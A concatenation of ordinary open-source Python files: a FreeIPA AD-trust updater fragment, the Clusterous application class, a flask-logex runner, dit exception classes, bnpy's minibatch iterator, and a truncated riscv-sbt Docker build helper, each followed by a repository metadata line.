            tdo.update(changes)
            try:
                ldap.update_entry(tdo)
            except errors.EmptyModlist:
                logger.debug("No update was required for TDO %s",
                             tdo.single_value.get('krbCanonicalName'))
        return False, []
@register()
class update_adtrust_agents_members(Updater):
    """Make every adtrust agent a member of the adtrust agents group.

    cn=adtrust agents,cn=sysaccounts,cn=etc,$BASEDN must contain, for each
    agent, both its cifs service principal entry and its host entry:
      - member: krbprincipalname=cifs/master@realm,cn=services,cn=accounts,base
      - member: fqdn=master,cn=computers,cn=accounts,base
    """

    def execute(self, **options):
        ldap = self.api.Backend.ldap2
        # Nothing to do unless AD trust support is enabled on this server
        if not self.api.Command.adtrust_is_enabled()['result']:
            logger.debug('AD Trusts are not enabled on this server')
            return False, []

        agents_dn = DN(
            ('cn', 'adtrust agents'), self.api.env.container_sysaccounts,
            self.api.env.basedn)
        try:
            agents_entry = ldap.get_entry(agents_dn, ['member'])
        except errors.NotFound:
            logger.error("No adtrust agents group found")
            return False, []

        # Derive the host DN of every cifs/<hostname>@REALM member
        realm_suffix = '@{}'.format(self.api.env.realm).lower()
        host_dns = []
        for member_dn in agents_entry.get('member', []):
            rdn = member_dn[0]
            if rdn.attr.lower() != 'krbprincipalname':
                continue
            principal = rdn.value
            lowered = principal.lower()
            if lowered.startswith('cifs/') and lowered.endswith(realm_suffix):
                # strip the leading 'cifs/' and the trailing '@REALM'
                hostname = principal[len('cifs/'):-len(realm_suffix)]
                host_dns.append(DN(('fqdn', hostname),
                                   self.api.env.container_host,
                                   self.api.env.basedn))

        # Add the fqdn=hostname... entries to the group
        service.add_principals_to_group(
            ldap,
            agents_dn,
            "member",
            host_dns)

        return False, []
| encukou/freeipa | ipaserver/install/plugins/adtrust.py | Python | gpl-3.0 | 37,987 |
# Copyright 2015 Nicta
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import yaml
import os
import sys
import logging
import logging.config
import re
import boto
import defaults
import cluster
import clusterbuilder
from environmentfile import EnvironmentFile
import environmentfile
import clusterousconfig
import environment
import helpers
from helpers import SchemaEntry
class FileError(Exception):
    """Base error for problems with user-supplied files.

    The offending file name, when known, is kept in ``filename``
    (empty string otherwise).
    """
    def __init__(self, message, filename=''):
        Exception.__init__(self, message)
        self.filename = filename
class ConfigError(FileError):
    """Raised for errors in the Clusterous configuration file."""
    pass
class EnvironmentFileError(FileError):
    """Raised for problems in an environment file; carries its filename."""
    pass
class NoWorkingClusterError(Exception):
    """Raised when no working (current) cluster is available."""
    pass
class ProfileError(Exception):
    """Raised for invalid or unreadable profile files."""
    pass
class ClusterError(Exception):
    """Raised for general cluster operation failures."""
    pass
class Clusterous(object):
    """
    Clusterous application

    Thin application layer that translates user operations (create cluster,
    run environment, sync files, scale, destroy, ...) into calls on a
    Cluster object obtained from the `cluster` module.
    """

    def __init__(self, config, config_type):
        """
        config: validated configuration dictionary
        config_type: key used to select the concrete Cluster class
        """
        self.clusters = []
        self._config = {}
        self._cluster_class = None
        self._logger = logging.getLogger(__name__)
        self._config = config
        self._cluster_class = cluster.get_cluster_class(config_type)
        # Make sure the local configuration directory exists
        conf_dir = os.path.expanduser(defaults.local_config_dir)
        if not os.path.exists(conf_dir):
            os.makedirs(conf_dir)

    def _read_profile(self, profile_file):
        """
        Given user supplied file path, read in and validate profile file.
        Return dictionary contents
        """
        full_path = os.path.abspath(os.path.expanduser(profile_file))
        if not os.path.isfile(full_path):
            raise ProfileError('Cannot open file "{0}"'.format(profile_file))

        # Fix: use a context manager so the profile file handle is closed
        # (previously the stream was opened and never closed).
        try:
            with open(full_path, 'r') as stream:
                # NOTE(review): yaml.load without an explicit Loader can
                # construct arbitrary Python objects; consider yaml.safe_load
                # if profile files may come from untrusted sources.
                contents = yaml.load(stream)
        except yaml.YAMLError as e:
            raise ProfileError('Invalid YAML format {0}'.format(e))

        main_schema = {
            'cluster_name': SchemaEntry(True, None, str, None),
            'controller_instance_type': SchemaEntry(False, '', str, None),
            'shared_volume_size': SchemaEntry(False, 0, int, None),
            'central_logging_level': SchemaEntry(False, 0, int, None),
            'environment_file': SchemaEntry(False, '', str, None),
            'shared_volume_id': SchemaEntry(False, '', str, None),
            'parameters': SchemaEntry(True, {}, dict, None)
        }

        # Validate profile file
        is_valid, message, validated = helpers.validate(contents, main_schema)
        if not is_valid:
            raise ProfileError(message)
        if not defaults.taggable_name_re.match(validated['cluster_name']):
            raise ProfileError('Unsupported characters in cluster_name "{0}"'.format(validated['cluster_name']))
        if len(validated['cluster_name']) > defaults.taggable_name_max_length:
            raise ProfileError('"cluster_name" cannot be more than {0} characters'.format(defaults.taggable_name_max_length))
        if not 0 <= validated['central_logging_level'] <= 2:
            raise ProfileError('"central_logging_level" must be either 0, 1 or 2')
        if validated['shared_volume_size'] < 0:
            raise ProfileError('"shared_volume_size" cannot be negative')
        return validated

    def make_cluster_object(self, cluster_name=None, cluster_name_required=True, cluster_must_be_running=True):
        """
        Instantiate and return the configured Cluster class, translating
        low-level cluster exceptions into application-level ones.
        Returns None when no cluster class or config is available.
        """
        if not (self._cluster_class and self._config):
            return None
        else:
            success, message = self._cluster_class.validate_config(self._config)
            if not success:
                raise ConfigError('Error in configuration: ' + message)
        # NOTE(review): if ClusterInitException subclasses ClusterException,
        # the second handler below is unreachable -- verify the exception
        # hierarchy in the cluster module.
        try:
            return self._cluster_class(self._config, cluster_name, cluster_name_required, cluster_must_be_running)
        except cluster.ClusterException as e:
            raise ClusterError(e)
        except cluster.ClusterInitException as e:
            raise NoWorkingClusterError(e)

    def create_cluster(self, profile_file, launch_env=True):
        """
        Create a new cluster from profile file

        NOTE(review): the launch_env parameter is currently unused; the
        environment is launched whenever the profile names one.
        """
        profile = self._read_profile(profile_file)
        env_file = None
        cluster_spec = None
        try:
            if profile['environment_file']:
                env_file = EnvironmentFile(profile['environment_file'], profile['parameters'], profile_file)
            # If necessary, obtain cluster spec
            if not env_file or (not env_file.spec['cluster']):
                default_file_path = defaults.get_script(defaults.default_cluster_def_filename)
                cluster_env_file = EnvironmentFile(default_file_path, profile['parameters'])
                cluster_spec = cluster_env_file.spec['cluster']
            else:
                cluster_spec = env_file.spec['cluster']
        except environmentfile.UnknownValue as e:
            # If unknown value found, probably an error in the profile (i.e. user params)
            raise ProfileError(str(e))
        except environmentfile.UnknownParams as e:
            # If the profile file includes param not recognised
            raise ProfileError(str(e))
        except environmentfile.EnvironmentSpecError as e:
            # Otherwise it's a problem in the environment file itself
            raise EnvironmentFileError(str(e), filename=profile['environment_file'])
        except cluster.ClusterException as e:
            raise ClusterError(e)

        self._logger.debug('Actual cluster spec: {0}'.format(cluster_spec))

        # Init Cluster object
        cl = self.make_cluster_object(cluster_name_required=False, cluster_must_be_running=False)
        builder = clusterbuilder.ClusterBuilder(cl)
        self._logger.info('Creating cluster...')
        created = builder.create_cluster(profile['cluster_name'], cluster_spec, profile['central_logging_level'],
                        profile['shared_volume_size'], profile['controller_instance_type'], profile['shared_volume_id'])
        if not created:
            return False, ''
        self._logger.info('Cluster "{0}" created'.format(profile['cluster_name']))

        message = ''
        # Run environment if environment file is available
        if env_file:
            self._logger.info('Running environment...')
            try:
                env = environment.Environment(cl)
                # Run environment (but wait 10 seconds for Mesos to init)
                success, message = env.launch_from_spec(env_file, 10)
                self._logger.info('Environment is running')
            except environment.Environment.LaunchError as e:
                self._logger.error(e)
                self._logger.error('Failed to run environment')
                return False, message
        return True, message

    def run_environment(self, environment_file):
        """Launch the environment described by environment_file on the
        current working cluster.  Returns (success, message)."""
        cl = self.make_cluster_object()
        try:
            env_file = EnvironmentFile(environment_file)
            env = environment.Environment(cl)
            success, message = env.launch_from_spec(env_file)
        except environmentfile.EnvironmentSpecError as e:
            raise EnvironmentFileError(e, filename=environment_file)
        except environment.Environment.LaunchError as e:
            self._logger.error(e)
            self._logger.error('Failed to run environment')
            return False, ''
        return success, message

    def quit_environment(self, tunnel_only=False):
        """Stop the running environment, or only tear down local SSH
        tunnels when tunnel_only is True."""
        cl = self.make_cluster_object()
        success = True
        if not tunnel_only:
            # Quit running apps
            env = environment.Environment(cl)
            success &= env.destroy()
        else:
            self._logger.info('Only removing any local SSH tunnels')
            success &= cl.delete_all_permanent_tunnels()
        return success

    def scale_nodes(self, action, num_nodes, node_name):
        """Add ('add') or remove ('rm') num_nodes nodes of the given type,
        rescaling the running environment accordingly."""
        cl = self.make_cluster_object()
        builder = clusterbuilder.ClusterBuilder(cl)
        delta = num_nodes
        actual_node_name = node_name
        if action == 'add':
            success, message, actual_node_name = builder.add_nodes(num_nodes, node_name)
        elif action == 'rm':
            success, message, actual_node_name = builder.rm_nodes(num_nodes, node_name)
            delta = -num_nodes
        else:
            raise ValueError('action must be either "add" or "rm"')

        env = environment.Environment(cl)
        if success and env.get_running_component_info():
            self._logger.info('Scaling running environment')
            success, message = env.scale_app(actual_node_name, delta, wait_time=60)
        return success, message

    def docker_build_image(self, args):
        """
        Create a new docker image
        """
        full_path = os.path.abspath(args.dockerfile_folder)
        if not os.path.isdir(full_path):
            self._logger.error("Error: Folder '{0}' does not exists.".format(full_path))
            return False
        if not os.path.exists("{0}/Dockerfile".format(full_path)):
            self._logger.error("Error: Folder '{0}' does not have a Dockerfile.".format(full_path))
            return False
        cl = self.make_cluster_object()
        cl.docker_build_image(full_path, args.image_name)

    def docker_image_info(self, image_name):
        """
        Gets information of a Docker image
        """
        cl = self.make_cluster_object()
        return cl.docker_image_info(image_name)

    def sync_put(self, local_path, remote_path):
        """
        Sync local folder to the cluster
        """
        cl = self.make_cluster_object()
        return cl.sync_put(local_path, remote_path)

    def sync_get(self, local_path, remote_path):
        """
        Sync folder from the cluster to local
        """
        cl = self.make_cluster_object()
        return cl.sync_get(local_path, remote_path)

    def ls(self, remote_path):
        """
        List content of a folder on the on cluster
        """
        cl = self.make_cluster_object()
        return cl.ls(remote_path)

    def rm(self, remote_path):
        """
        Delete content of a folder on the on cluster
        """
        cl = self.make_cluster_object()
        return cl.rm(remote_path)

    def connect_to_container(self, component_name):
        """Attach to the container of a running component.  Fails when the
        component does not exist or has more than one instance."""
        # Check if component_name exists
        cl = self.make_cluster_object()
        env = environment.Environment(cl)
        running_apps = env.get_running_component_info()
        app = running_apps.get(component_name)
        if app is None:
            message = "Component '{0}' does not exist".format(component_name)
            return (False, message)
        # NOTE(review): 'app' is compared as an instance count here --
        # confirm get_running_component_info() maps names to counts.
        if app > 1:
            message = "Cannot connect to '{0}' because there is more than one instance running on the cluster".format(component_name)
            return (False, message)
        return cl.connect_to_container(component_name)

    def central_logging(self):
        """Open a connection to the central logging facility."""
        cl = self.make_cluster_object()
        return cl.connect_to_central_logging()

    def cluster_status(self):
        """Return (True, info) where info describes nodes, their running
        components and shared volume usage."""
        cl = self.make_cluster_object()
        env = environment.Environment(cl)
        info = cl.get_cluster_info()
        component_info = env.get_running_components_by_node()
        # Fill in information about running components
        for node in info.get('nodes', {}):
            components = []
            for c in component_info.get(node, []):
                component = {}
                component['name'] = c.get('app_id', '').strip('/')
                component['count'] = c.get('instance_count', 0)
                components.append(component)
            info['nodes'][node]['components'] = components
        # Add information about shared volume usage
        info['shared_volume'] = cl.get_shared_volume_usage_info()
        return True, info

    def workon(self, cluster_name):
        """
        Sets a working cluster
        """
        cl = self.make_cluster_object(cluster_name, cluster_must_be_running=False)
        success = cl.workon()
        if success:
            message = 'Switched to {0}'.format(cluster_name)
        else:
            message = 'Could not switch to cluster {0}'.format(cluster_name)
        return success, message

    def destroy_cluster(self, leave_shared_volume, force_delete_shared_volume):
        """Terminate the working cluster, optionally keeping or force
        deleting its shared volume."""
        cl = self.make_cluster_object(cluster_must_be_running=False)
        self._logger.info('Destroying cluster {0}'.format(cl.cluster_name))
        cl.terminate_cluster(leave_shared_volume, force_delete_shared_volume)

    def ls_volumes(self):
        """
        List available shared volumes left behind from destroyed cluster
        """
        cl = self.make_cluster_object(cluster_name_required=False, cluster_must_be_running=False)
        return (True, cl.ls_volumes())

    def rm_volume(self, volume_id):
        """
        Deletes a shared volume left behind from destroyed cluster
        """
        cl = self.make_cluster_object(cluster_name_required=False, cluster_must_be_running=False)
        return cl.rm_volume(volume_id)
| sirca/clusterous | clusterous/clusterousmain.py | Python | apache-2.0 | 13,510 |
"""Runner for testing app and blueprint logging individually"""
import subprocess
from tests.samples import app
if __name__ == '__main__':
    # Run the sample app; returns when the server is stopped.
    app.run()
    # Clean up log files produced by the run.  shutil.rmtree is the
    # portable equivalent of `rm -rf` and avoids spawning an external
    # process; ignore_errors=True matches rm -f's tolerance of a missing
    # directory.
    import shutil
    shutil.rmtree('logs', ignore_errors=True)
| pinntech/flask-logex | runner.py | Python | mit | 198 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Information Theory Exceptions
=============================
Exceptions related to information theory.
"""
# Public API of this module; star-imports expose only these names.
__all__ = ['ditException',
           'IncompatibleDistribution',
           'InvalidBase',
           'InvalidDistribution',
           'InvalidNormalization',
           'InvalidOutcome',
           'InvalidProbability']
class ditException(Exception):
"""
Base class for all `dit` exceptions.
"""
def __init__(self, *args, **kwargs):
if 'msg' in kwargs:
# Override the message in the first argument.
self.msg = kwargs['msg']
elif args:
self.msg = args[0]
else:
self.msg = ''
self.args = args
self.kwargs = kwargs
def __str__(self):
return self.msg
def __repr__(self):
return "{0}{1}".format(self.__class__.__name__, repr(self.args))
class IncompatibleDistribution(ditException):
    """
    Exception for an incompatible distribution.
    """
    def __init__(self, *args, **kwargs):
        """
        Initialize the exception with a fixed explanatory message.
        """
        args = ("The distribution is not compatible.",) + args
        ditException.__init__(self, *args, **kwargs)
class InvalidBase(ditException):
    """
    Exception for an invalid logarithm base.
    """
    def __init__(self, *args, **kwargs):
        """
        Initialize the exception.

        Parameters
        ----------
        base : float
            The invalid base.
        """
        if args:
            message = "{0} is not a valid logarithm base.".format(args[0])
            args = (message,) + args
        ditException.__init__(self, *args, **kwargs)
class InvalidDistribution(ditException):
    """
    Exception thrown for an invalid distribution.
    """
    # Marker subclass: carries no extra state beyond ditException.
    pass
class InvalidOutcome(ditException):
    """
    Exception for an invalid outcome.
    """
    def __init__(self, *args, **kwargs):
        """
        Initialize the exception.

        Parameters
        ----------
        outcome : sequence
            The invalid outcomes.
        single : bool
            Specifies whether `outcome` represents a single outcome or not.
        """
        single = kwargs.get('single', True)
        if args:
            bad = args[0]
            if single:
                msg = "Outcome {0!r} is not in the sample space.".format(bad)
            else:
                msg = "Outcomes {0} are not in the sample space.".format(bad)
        else:
            # No outcome supplied: fall back to a caller-provided message.
            msg = kwargs.get('msg', '')
        args = (msg,) + args
        ditException.__init__(self, *args, **kwargs)
class InvalidNormalization(ditException):
    """
    Exception thrown when a distribution is not normalized.

    The offending probability sum is available as ``summation``.
    """
    def __init__(self, *args, **kwargs):
        """
        Initializes the exception.

        The sole argument should be the summation of the probabilities.
        """
        self.summation = args[0]
        args = ("Bad normalization: {0!r}".format(args[0]),) + args
        ditException.__init__(self, *args, **kwargs)
class InvalidProbability(ditException):
    """
    Exception thrown when a probability is not in [0,1].
    """
    def __init__(self, *args, **kwargs):
        """
        Initialize the exception.

        Parameters
        ----------
        p : float | sequence
            The invalid probability or sequence of probabilities.
        ops : operations
            The operation handler for the incoming probabilities; must
            provide ``zero``, ``one`` and ``base`` attributes.
        """
        ops = kwargs['ops']
        bounds = "[{0}, {1}]".format(ops.zero, ops.one)
        prob = args[0]
        # Fix: the docstring promises scalars are accepted, but len() on a
        # float raised TypeError.  Wrap bare scalars in a list.
        try:
            count = len(prob)
        except TypeError:
            prob = [prob]
            count = 1
        if count == 1:
            msg = "Probability {0} is not in {1} (base: {2!r})."
        else:
            prob = list(prob)
            msg = "Probabilities {0} are not in {1} (base: {2!r})."
        msg = msg.format(prob, bounds, ops.base)
        args = (msg,) + args
        ditException.__init__(self, *args, **kwargs)
| chebee7i/dit | dit/exceptions.py | Python | bsd-3-clause | 4,115 |
'''
MinibatchIterator.py
Generic object for iterating over a single bnpy Data set
by considering one subset minibatch (often just called a batch) at a time
Usage
--------
Construct by providing the underlying full-dataset
>> MB = MinibatchIterator(Data, nBatch=10, nObsBatch=100)
Then call
has_next_batch() to test if more data is available
get_next_batch() to get the next batch (as a Data object)
Batches are defined via a random partition of all data items
e.g. for 100 items split into 20 batches
batch 1 : items 5, 22, 44, 30, 92
batch 2 : items 93, 33, 46, 12, 78,
etc.
Supports multiple laps through the data. Specify # of laps with parameter nLap.
Traversal order of the batch is randomized every lap through the full dataset
Set the "dataorderseed" parameter to get repeatable orders.
Attributes
-------
nBatch : number of batches to divide full dataset into
nObsBatch : number of observations in each batch (on average)
nObsTotal : number of observations in entire full dataset
nLap : number of times to pass thru all batches in dataset during iteration
batchID : exact integer ID of the current batch. range=[0, nBatch-1]
curLapPos : integer count of current position in batch order. incremented 1 at a time.
lapID : integer ID of the current lap
'''
import numpy as np
# Upper bound applied (via modulo) to user-provided random seeds.
MAXSEED = 1000000


class MinibatchIterator(object):
    """Iterator over fixed random batches of a bnpy dataset.

    The full dataset is partitioned once (seeded by `dataorderseed`) into
    `nBatch` disjoint batches; the traversal order of those batches is
    reshuffled on every lap.  See the module docstring for attribute
    descriptions.
    """

    def __init__(self, Data, nBatch=10, nObsBatch=None, nLap=10,
                 dataorderseed=42, startLap=0, **kwargs):
        ''' Constructor for creating an iterator over the batches of data
        '''
        self.Data = Data
        self.nBatch = nBatch
        self.nLap = nLap + startLap
        self.nObsTotal = Data.nObsTotal
        if nObsBatch is None:
            # Fix: floor division so slice bounds stay integers under
            # Python 3 (true division yields a float and breaks slicing).
            self.nObsBatch = Data.nObsTotal // nBatch
        else:
            self.nObsBatch = nObsBatch
        # Config order in which batches are traversed
        self.curLapPos = -1
        self.lapID = startLap
        self.dataorderseed = int(int(dataorderseed) % MAXSEED)
        # Make list with entry for every distinct batch
        # where each entry is itself a list of obsIDs in the full dataset
        self.obsIDByBatch = self.configObsIDsForEachBatch()

    ######################################################### accessor methods
    #########################################################
    def has_next_batch(self):
        ''' Return True when at least one more batch remains to serve. '''
        if self.lapID >= self.nLap:
            return False
        if self.lapID == self.nLap - 1 and self.curLapPos == self.nBatch - 1:
            return False
        return True

    def get_next_batch(self):
        ''' Returns DataObj of the next batch

        Raises
        ------
        StopIteration
            when all laps have been exhausted.
        '''
        if not self.has_next_batch():
            raise StopIteration()
        self.curLapPos += 1
        if self.curLapPos >= self.nBatch:
            # Wrapped around: start a new lap
            self.curLapPos = 0
            self.lapID += 1
        # Create the DataObj for the current batch
        self.batchOrderCurLap = self.get_rand_order_for_batchIDs_current_lap()
        self.batchID = self.batchOrderCurLap[self.curLapPos]
        obsIDsCurBatch = self.obsIDByBatch[self.batchID]
        bData = self.Data.select_subset_by_mask(obsIDsCurBatch)
        return bData

    def getObsIDsForCurrentBatch(self):
        ''' Return the list of obsIDs belonging to the batch served last. '''
        return self.obsIDByBatch[self.batchOrderCurLap[self.curLapPos]]

    ######################################################### internal methods
    #########################################################
    def configObsIDsForEachBatch(self):
        ''' Assign each observation in dataset to a batch by random permutation

        Returns
        --------
        obsIDByBatch : dict of length self.nBatch,
                       where obsIDByBatch[bID] : list of all obsIDs in batch bID
        '''
        PRNG = np.random.RandomState(self.dataorderseed)
        obsIDs = PRNG.permutation(self.Data.nObsTotal).tolist()
        obsIDByBatch = dict()
        for batchID in range(self.nBatch - 1):
            obsIDByBatch[batchID] = obsIDs[:self.nObsBatch]
            del obsIDs[:self.nObsBatch]
        # Last batch gets leftovers, may be bigger
        obsIDByBatch[self.nBatch - 1] = obsIDs
        return obsIDByBatch

    def get_rand_order_for_batchIDs_current_lap(self):
        ''' Returns array of batchIDs, permuted in random order
            Order changes each time we traverse all items (each lap)
        '''
        curseed = int(self.dataorderseed + self.lapID)
        PRNG = np.random.RandomState(curseed)
        return PRNG.permutation(self.nBatch)

    ######################################################### I/O methods
    #########################################################
    def get_text_summary(self):
        ''' Returns string with human-readable description of this dataset
            e.g. source, author/creator, etc.
        '''
        if hasattr(self, 'summary'):
            return self.summary
        return 'Minibatch Iterator: %d batches' % (self.nBatch)

    def summarize_num_observations(self):
        ''' Return short text summary of batch and observation counts. '''
        s = ' num batch %d, num obs per batch %d\n' % (self.nBatch, self.nObsBatch)
        s += ' num obs (total across all batches): %d' % (self.Data.nObsTotal)
        return s
| daeilkim/refinery | refinery/bnpy/bnpy-dev/bnpy/data/MinibatchIterator.py | Python | mit | 4,947 |
#!/usr/bin/env python3
from auto.utils import cat, cd, mkdir_if_needed, mpath, path, shell
import argparse
import re
import os
import sys
# Root of the riscv-sbt checkout; TOPDIR must be exported by the caller.
TOPDIR = os.environ["TOPDIR"]
DOCKER_DIR = path(TOPDIR, "docker")
#
# Helper
#
class Helper:
    """Host-environment helpers for the docker wrapper script."""

    @staticmethod
    def is_cygwin():
        """Return True when running under cygwin."""
        # `shell` raises on non-zero exit status, so a failing grep means
        # we are not on cygwin.
        try:
            shell("uname | grep -i cygwin >/dev/null", quiet=True)
        except:
            return False
        return True

    @staticmethod
    def cygpath(path):
        """Convert *path* to a mixed-style path on cygwin; pass through
        unchanged elsewhere."""
        if not Helper.is_cygwin():
            return path
        return shell("cygpath -m " + path, save_out=True).strip()

    @staticmethod
    def clean_imgs():
        """Remove every container instance plus all '<none>' and 'sbt'
        docker images."""
        containers = shell("docker ps -a | awk '{print$1}' | sed 1d",
                           save_out=True).split()
        if containers:
            shell("docker rm " + " ".join(containers))

        images = shell(
            "docker images | grep -e sbt -e '<none>' | awk '{print$3}'",
            save_out=True).split()
        if images:
            shell("docker rmi " + " ".join(images))
#
# Volumes
#
class Volume:
    """A named docker volume plus its mount point inside the container."""

    def __init__(self, name, vol_name, mount_point):
        self.name = name
        self.vol_name = vol_name
        self.mount_point = mount_point

    def create(self):
        """Create the docker volume unless it already exists."""
        # `shell` raises when grep finds nothing, i.e. the volume is absent.
        try:
            shell("docker volume ls | grep " + self.vol_name + " >/dev/null",
                  quiet=True)
        except:
            shell("docker volume create " + self.vol_name)

    def volstr(self):
        """Return the docker --mount argument for this volume."""
        spec = "type=volume,source={},destination={}".format(
            self.vol_name, self.mount_point)
        return "--mount " + spec
class Volumes:
    """The fixed set of named docker volumes used by the sbt container."""

    def __init__(self):
        self.vols = {}
        for vname, mnt in (("build", "/riscv-sbt/build"),
                           ("toolchain", "/riscv-sbt/toolchain")):
            self.vols[vname] = Volume(vname, "sbt-vol-" + vname, mnt)

    def __getitem__(self, key):
        return self.vols[key]

    def volstr(self):
        """Return the concatenated --mount arguments for all volumes."""
        vstr = ''
        for vol in self.vols.values():
            vstr = cat(vstr, vol.volstr())
        return vstr
VOLS = Volumes()
#
# Docker
#
class Docker:
    """Wrapper for running/exec-ing commands in the sbt docker container."""
    # When True, bind-mount the host toolchain dir into the container
    # instead of using the named docker volumes (see volstr()).
    BIND = True
    def __init__(self, name, img):
        # name: container name; img: image to run
        self.name = name
        self.img = img
    def cmd(self, dcmd, cmd, interactive, vols=None):
        """Assemble and run a `docker <dcmd>` command line.

        dcmd: docker sub-command ("run" or "exec")
        cmd: command to execute inside the container (may be None)
        interactive: allocate a TTY (-it) and, on cygwin, use winpty
        vols: pre-built volume/mount argument string (run only)
        """
        # cygwin needs winpty for interactive docker sessions
        if Helper.is_cygwin():
            prefix = "winpty "
        else:
            prefix = ''
        privileged = True
        # Forward MAKE_OPTS into the container so builds inherit it
        make_opts = os.getenv("MAKE_OPTS")
        if make_opts:
            env = "MAKE_OPTS=" + make_opts
        else:
            env = None
        # Each fragment below is either empty or starts with a space, so
        # the final format() produces a correctly spaced command line.
        fmtdata = {
            "prefix": prefix if interactive else "",
            "dcmd": dcmd,
            "privileged": " --privileged" if privileged else "",
            "interactive": " -it" if interactive else "",
            "rm": " --rm" if dcmd == "run" else "",
            "hostname": " -h dev" if dcmd == "run" else "",
            "name": " --name " + self.name if dcmd == "run" else "",
            "vols": " " + vols if vols else "",
            "img": " " + self.img,
            "cmd": " " + cmd if cmd else "",
            "env": " -e " + env if env and dcmd == "run" else "",
        }
        shell(("{prefix}docker {dcmd}" +
            "{privileged}{interactive}{rm}{hostname}{name}{vols}{env}{img}{cmd}"
            ).format(**fmtdata))
    def run(self, cmd=None, interactive=False):
        # Start a new container (mounts decided by Docker.BIND)
        self.cmd("run", cmd, interactive, vols=Docker.volstr(Docker.BIND))
    def exec(self, cmd, interactive=True):
        # Execute a command in the already-running container
        self.cmd("exec", cmd, interactive)
    @staticmethod
    def volstr(bind):
        """Build the mount arguments: always bind-mount the source tree;
        the toolchain is bind-mounted when `bind`, otherwise the named
        docker volumes are used."""
        src = Helper.cygpath(TOPDIR)
        dst = "/riscv-sbt"
        bmount = "--mount type=bind,source={},destination={}"
        vstr = bmount.format(src, dst)
        if bind:
            vstr = cat(vstr,
                bmount.format(path(src, "toolchain"), path(dst, "toolchain")))
        else:
            vstr = cat(vstr, VOLS.volstr())
        return vstr
#
# Commits
#
# module + commit_hash
# module + commit_hash
class Commit:
    """A (submodule name, git commit hash) pair."""
    def __init__(self, module, commit):
        self.module = module
        self.commit = commit
class Commits:
    """Record and retrieve the commit hashes of all tracked submodules."""
    def __init__(self, topdir, docker_dir):
        # topdir: repository root; hashes persist in <docker_dir>/commits.txt
        self.topdir = topdir
        self.commits_txt = path(docker_dir, "commits.txt")
    # get current commit hashes
    def get_current(self):
        """Return the current Commit list: one per submodule (skipping
        lowrisc-llvm) plus the riscv-sbt top repository itself."""
        commits = []
        with cd(self.topdir):
            # get submodules
            out = shell("git submodule", save_out=True)
            lines = out.split("\n")
            # `git submodule` lines look like " <hash> submodules/<name> ..."
            patt = re.compile("[ -]*([^ ]+) +submodules/([^ ]+) *")
            for l in lines:
                if l.find("lowrisc-llvm") >= 0:
                    continue
                r = re.match(patt, l)
                if r:
                    commit = r.group(1)
                    module = r.group(2)
                    commits.append(Commit(module, commit))
            # add sbt
            # NOTE(review): .format(self.topdir) below is a no-op when the
            # rev-parse output contains no '{}' placeholders -- looks like
            # a leftover; confirm and consider removing.
            commits.append(Commit("riscv-sbt",
                shell("git rev-parse HEAD", save_out=True)
                    .format(self.topdir)
                    .strip()))
        return commits
    # save to file
    def save(self, commits):
        """Write one '<module> <hash>' line per commit to commits.txt."""
        with open(self.commits_txt, "w") as f:
            for commit in commits:
                f.write("{} {}\n".format(commit.module, commit.commit))
    # load from file
    def load(self):
        """Load commits.txt into self.commits ({module: hash}); returns
        self for chaining."""
        self.commits = {}
        with open(self.commits_txt, "r") as f:
            patt = re.compile("([^ ]+) ([^ ]+)")
            for line in f:
                r = re.match(patt, line)
                self.commits[r.group(1)] = r.group(2)
        return self
    def __getitem__(self, key):
        # Lookup by module name; requires a prior load()
        return self.commits[key]
#
# Sources
#
# source package
class Source:
    """A git source repository to clone and check out at a pinned commit."""

    def __init__(self, name, url, dir=None, clone_flags=None):
        self.name = name
        if dir == "top":
            # The main repo lives at the top dir, not under submodules/.
            self.dstdir = TOPDIR
            self.parent_dir = None
        else:
            self.parent_dir = path(TOPDIR, "submodules")
            self.dstdir = path(self.parent_dir, name)
        self.url = url
        self.clone_flags = clone_flags
        # Fetch remote updates on subsequent get() calls.
        self.update = True

    def get(self):
        """Clone (or fetch) the repository and check out self.commit."""
        if not os.path.exists(self.dstdir):
            mkdir_if_needed(self.parent_dir)
            with cd(self.parent_dir):
                cmd = cat("git clone", self.clone_flags, self.url)
                shell(cmd)
        elif self.update:
            with cd(self.dstdir):
                shell("git fetch")
        with cd(self.dstdir):
            # Only switch if HEAD differs from the pinned commit.
            shell((
                "if [ `git rev-parse HEAD` != {0} ]; then " +
                "git checkout {0}; fi").format(self.commit.strip()))
class Sources:
    """All source repos needed to build riscv-sbt, pinned via commits.txt."""

    def __init__(self):
        self.srcs = [
            Source("riscv-sbt",
                "https://github.com/OpenISA/riscv-sbt.git",
                dir="top"),
            Source("riscv-gnu-toolchain",
                "https://github.com/riscv/riscv-gnu-toolchain",
                clone_flags="--recursive"),
            Source("llvm",
                "https://github.com/OpenISA/llvm",
                clone_flags="--recursive -b lowrisc"),
            Source("clang",
                "https://github.com/OpenISA/clang",
                clone_flags="--recursive -b lowrisc"),
            Source("riscv-fesvr",
                "https://github.com/riscv/riscv-fesvr",
                clone_flags="--recursive"),
            Source("riscv-pk",
                "https://github.com/riscv/riscv-pk",
                clone_flags="--recursive"),
            Source("riscv-isa-sim",
                "https://github.com/riscv/riscv-isa-sim",
                clone_flags="--recursive"),
            Source("riscv-qemu-tests",
                "https://github.com/arsv/riscv-qemu-tests",
                clone_flags="--recursive")
        ]
        commits = Commits(TOPDIR, DOCKER_DIR)
        commits.load()
        # set commits
        # Pin each source to the commit recorded in commits.txt.
        for src in self.srcs:
            src.commit = commits[src.name]

    # get all sources
    def get(self):
        """Clone/fetch and checkout every source repository."""
        for src in self.srcs:
            src.get()
#
# Images
#
class Image:
    """A docker image plus the post-build provisioning steps it requires."""

    # Shared pinned-commit table, loaded once at class definition time.
    commits = Commits(TOPDIR, DOCKER_DIR).load()

    def __init__(self, name, img=None):
        self.name = name
        # Default image tag is "sbt-<name>" unless an explicit tag is given.
        if not img:
            self.img = "sbt-" + name
        else:
            self.img = img

    # build if done file does not exist
    def build(self, force):
        """docker build the image and run its provisioning steps.

        Skipped when the per-image "done" marker exists, unless `force`.
        """
        dir = path(DOCKER_DIR, self.name)
        done = path(dir, "done")
        # skip if done
        if not force and os.path.exists(done):
            return
        # docker build
        with cd(DOCKER_DIR):
